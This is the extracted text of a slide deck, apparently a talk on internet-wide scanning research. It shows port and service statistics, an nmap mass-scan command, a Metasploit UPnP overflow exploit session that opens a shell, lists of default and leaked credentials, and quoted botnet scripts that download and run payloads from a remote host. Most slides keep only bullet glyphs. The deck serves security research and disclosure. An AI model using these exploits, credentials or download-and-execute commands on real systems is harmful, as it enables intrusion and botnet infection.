Slide 1

Slide 1 text

No content

Slide 2

Slide 2 text

► ► ►

Slide 3

Slide 3 text

► ► ► ► ►

Slide 4

Slide 4 text

► ► ► ► ► ► ► ► ► ►

Slide 5

Slide 5 text

► ► ►

Slide 6

Slide 6 text

► ► ► ► ► ► # nmap -sS -PS443 -p443 -n --max-retries=1 -n -M 256 \ --open \ --min-rtt-timeout=1000ms --max-rtt-timeout=1000ms \ --min-hostgroup=50000 --min-rate=50000 \ --max-rate=50000 \ --script=banner-plus.nse \ --excludefile=exclude.txt \ -oG node.gnmap -oX node.xml \ -iR 250000 Code: https://gitub.com/hdm/scan-tools

Slide 7

Slide 7 text

► ► ► ► ► ► ► Code: https://gitub.com/hdm/scan-tools

Slide 8

Slide 8 text

► ► ► ► ► ► ► ► ► ►

Slide 9

Slide 9 text

► ► ► ► ► ►

Slide 10

Slide 10 text

► ► ► ► ► ► So what your saying is I should just ignore the excessive amount of port snooping coming from your system(s), and I should allow this on your word alone? Since when did you become my big brother? Are you related to Obama? Ironically, since the days you have begun your independent scans we have received a few DDOS attacks using udp_app port 53 traffic.....any correlation? Please identify your customer operating from the above address at the time mentioned, and terminate immediately his hacking activities. Please prevent him from continuing his hacking activities in the future as well. Due to the potential severity of this incident, we have reported it to the Computer Emergency Response Team (CERT) in United States (US) and Denmark. You are welcome to try and hack my network as an academic exercise but even if you are successful you will find nothing of interest, and any attempt to corrupt the O/S can be restored in a few minutes.

Slide 11

Slide 11 text

► ► ► ► ► ► ► ► ►

Slide 12

Slide 12 text

0 10,000,000 20,000,000 30,000,000 40,000,000 50,000,000 60,000,000 70,000,000 80,000,000 90,000,000 100,000,000 110,000,000 120,000,000 130,000,000 140,000,000 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Unique IPs by Service

Slide 13

Slide 13 text

1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Global IPv4 Services 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Australian IPv4 Services

Slide 14

Slide 14 text

0 10,000,000 20,000,000 30,000,000 40,000,000 50,000,000 60,000,000 70,000,000 80,000,000 90,000,000 100,000,000 110,000,000 120,000,000 130,000,000 140,000,000 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Unique IPs by Service ► ►

Slide 15

Slide 15 text

► ► ► ► ► ►

Slide 16

Slide 16 text

► ► ► ► ► ► ► ► ► Intel/Portable SDK MiniUPnP Broadcom SDK Others

Slide 17

Slide 17 text

► ► ► ► ► ► ► ► ► ►

Slide 18

Slide 18 text

► ► ► ► $ msfconsole msf > use exploit/multi/upnp/libupnp_ssdp_overflow msf exploit(libupnp_ssdp_overflow) > set RHOST 192.168.122.89 msf exploit(libupnp_ssdp_overflow) > exploit [*] Started reverse double handler [*] Exploiting 192.168.122.89 with target Supermicro Onboard IPMI (X9SCL/X9SCM) [+] Sending payload of 178 bytes to 192.168.122.89:56911... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command shell session 1 opened [*] Shutting down payload stager listener... uname -a Linux debian-armel 2.6.32-5-versatile #1 Wed Jan 12 23:05:11 UTC 2011 armv5tejl

Slide 19

Slide 19 text

0 10,000,000 20,000,000 30,000,000 40,000,000 50,000,000 60,000,000 70,000,000 80,000,000 90,000,000 100,000,000 110,000,000 120,000,000 130,000,000 140,000,000 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Unique IPs by Service ► ► ►

Slide 20

Slide 20 text

► ► ► Apache Microsoft NginX Netcraft - January 2013 RomPager Apache Akamai NginX Microsoft Critical.IO - January 2013

Slide 21

Slide 21 text

0 10,000,000 20,000,000 30,000,000 40,000,000 50,000,000 60,000,000 70,000,000 80,000,000 90,000,000 100,000,000 110,000,000 120,000,000 130,000,000 140,000,000 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Unique IPs by Service ►

Slide 22

Slide 22 text

► ► ► ► ► ► USA ESP IND TUR BRA ITA DEU POL RUS THA VNM CHN PER MYS ARG EGY GBR TWN KOR IDN Devices by Country

Slide 23

Slide 23 text

► ► ► ► ► ►

Slide 24

Slide 24 text

► ► ► ► ► ► ►

Slide 25

Slide 25 text

Usernames Passwords admin 12345 root h3capadmin lyzdm xialiang!@# lywlj nhkhwlwhz lymr admin lyjy 1234 lyzwm szwx@ah lyys huawei jlllylj itms123456 lygsg AAA888### lyjrw 662 lyyys abc123! lysw zch3capadmin lygmb 123456 lyfyh apadmin huawei password

Slide 26

Slide 26 text

► ► ► ► ► username=sa password=Masterkey2011 LicenseCheck=Defne DSN=sms;UID=XXX;PWD=XXXsys; DSN=GeoXXX;UID=XXX;PWD=XXXsys; 8383 password h4ve@gr8d3y --daemon --port 8020 --socks5 --s_user Windows --s_password System XXXX /ssh /auth=password /user=admin /passwd=admin_p@s$word http://a.b.c/manage/retail_login.php3?ms_id=14320101&passwd=7325 a.b.c.d:3389 --user administrator --pass passw0rd123

Slide 27

Slide 27 text

► ► ► ► ► ►

Slide 28

Slide 28 text

0 10,000,000 20,000,000 30,000,000 40,000,000 50,000,000 60,000,000 70,000,000 80,000,000 90,000,000 100,000,000 110,000,000 120,000,000 130,000,000 140,000,000 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Unique IPs by Service ► ►

Slide 29

Slide 29 text

► ► ► ► HUAWEI QUALCOMM ASUSTEK VMWARE HP DELL HYUNDAI MICROSOFT INTEL

Slide 30

Slide 30 text

0 10,000,000 20,000,000 30,000,000 40,000,000 50,000,000 60,000,000 70,000,000 80,000,000 90,000,000 100,000,000 110,000,000 120,000,000 130,000,000 140,000,000 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Unique IPs by Service ► ► ►

Slide 31

Slide 31 text

► ► ► ► 27% 15% 10% 7% 5% 29% FTP Software ProFTPD PureFTP Microsoft Firmware vsFTPd Mikrotik FileZilla Speedtouch Other 1.3.3g 1.3.1 1.3.3a 1.3.4a 1.3.3e 1.3.2e ProFTPD Versions 1.3.3g 1.3.1 1.3.3a 1.3.4a 1.3.3e 1.3.2e 1.3.3c 1.3.4b 1.3.0 1.3.3d 1.3.2c 1.2.10 1.3.0a 1.2.9 1.3.5rc1 1.3.2

Slide 32

Slide 32 text

0 10,000,000 20,000,000 30,000,000 40,000,000 50,000,000 60,000,000 70,000,000 80,000,000 90,000,000 100,000,000 110,000,000 120,000,000 130,000,000 140,000,000 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Unique IPs by Service ► ► ►

Slide 33

Slide 33 text

SMTP POP3 IMAP POP3S IMAPS

Slide 34

Slide 34 text

0 10,000,000 20,000,000 30,000,000 40,000,000 50,000,000 60,000,000 70,000,000 80,000,000 90,000,000 100,000,000 110,000,000 120,000,000 130,000,000 140,000,000 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Unique IPs by Service ► ►

Slide 35

Slide 35 text

► ► ► VNC Protocol Versions RFB 003.008 RFB 003.889 RFB 003.006 RFB 003.003 RFB 004.001 RFB 004.000 RFB 003.007 RFB 003.004

Slide 36

Slide 36 text

► ► ►

Slide 37

Slide 37 text

0 10,000,000 20,000,000 30,000,000 40,000,000 50,000,000 60,000,000 70,000,000 80,000,000 90,000,000 100,000,000 110,000,000 120,000,000 130,000,000 140,000,000 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185 Unique IPs by Service ► ►

Slide 38

Slide 38 text

► ► ► ► ► ►

Slide 39

Slide 39 text

► ► ► ► 0 1000 2000 3000 4000 5000 6000 OpenServer AIX Solaris UnixWare IRIX OpenVMS HPUX

Slide 40

Slide 40 text

Slide 41

Slide 41 text

Slide 42

Slide 42 text

Slide 43

Slide 43 text

► ►

Slide 44

Slide 44 text

No content

Slide 45

Slide 45 text

► ► ► ► ► ► ► ► ►

Slide 46

Slide 46 text

► ► ► ► ► ► ► ► ► ► ►

Slide 47

Slide 47 text

No content

Slide 48

Slide 48 text

► ► ► ► $ telnet A.B.C.D Escape character is '^]'. sh-3.00# history 1 root 2 admin 3 mkdir /var/run; mkdir /var/run/.sysV6 && cd /var/run/.sysV6 && wget -c http://176.xxx.xxx.xxx/sysV6/sysV6.sh && sh sysV6.sh || mkdir /var/run/.sysV6 && cd /var/run/.sysV6 && ftpget -u skynet -p cloud 176.xxx.xxx.xxx sysV6.sh sysV6/sysV6.sh && sh sysV6.sh &

Slide 49

Slide 49 text

► ► # THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER. # UPLOAD GETBINARIES.SH IN YOUR HTTPD. # YOUR HTTPD SERVER: REFERENCE_HTTP="http://173.xxx.xxx.xxx" wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPSEL} -P /var/run … wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPS} -P /var/run && … wget -c ${REFERENCE_HTTP}/${REFERENCE_ARM} -P /var/run && … wget -c ${REFERENCE_HTTP}/${REFERENCE_PPC} -P /var/run && … wget -c ${REFERENCE_HTTP}/${REFERENCE_SUPERH} -P /var/run && … wget -c ${REFERENCE_HTTP}/sshd -P /var/run && … wget -c ${REFERENCE_HTTP}/telnetd -P /var/run && … iptables -A INPUT -p tcp --dport 23 -j DROP mv /usr/bin/wget /usr/bin/wg mv /bin/wget /bin /wg

Slide 50

Slide 50 text

► ► ► ► ► ► ► ►

Slide 51

Slide 51 text

► ► ► ►

Slide 52

Slide 52 text

No content